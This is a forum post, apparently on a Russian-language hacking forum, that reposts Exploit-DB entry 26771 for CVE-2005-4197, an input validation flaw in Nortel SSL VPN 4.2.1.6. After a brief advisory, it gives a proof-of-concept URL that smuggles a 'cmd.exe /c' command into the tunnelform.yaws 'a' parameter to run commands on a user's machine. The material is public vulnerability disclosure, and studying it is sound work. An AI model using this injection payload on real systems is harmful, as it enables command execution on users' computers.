Exploit Nortel SSL VPN 4.2.1.6 - Web Interface Input Validation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
26771
Проверка EDB
  1. Пройдено
Автор
DANIEL FABIAN
Тип уязвимости
WEBAPPS
Платформа
CGI
CVE
cve-2005-4197
Дата публикации
2005-12-08
Код:
source: https://www.securityfocus.com/bid/15798/info

Nortel SSL VPN is prone to an input validation vulnerability. This issue could be exploited to cause arbitrary commands to be executed on a user's computer. Cross-site scripting attacks are also possible.

Nortel SSL VPN 4.2.1.6 is vulnerable to this issue; other versions may also be affected. 

https://SSL_VPN_SERVER/tunnelform.yaws?a=+cmd.exe+/c+echo+test+%3E+c:\\test.txt+&type=Custom&sp=443&n=1&ph=&pp=&0tm=tcp&0lh=127.0.0.1&0lp=8080&0hm=&0rh=10.10.10.10&0rp=80&sslEnabled=on&start=Start...
 
Источник
www.exploit-db.com

Похожие темы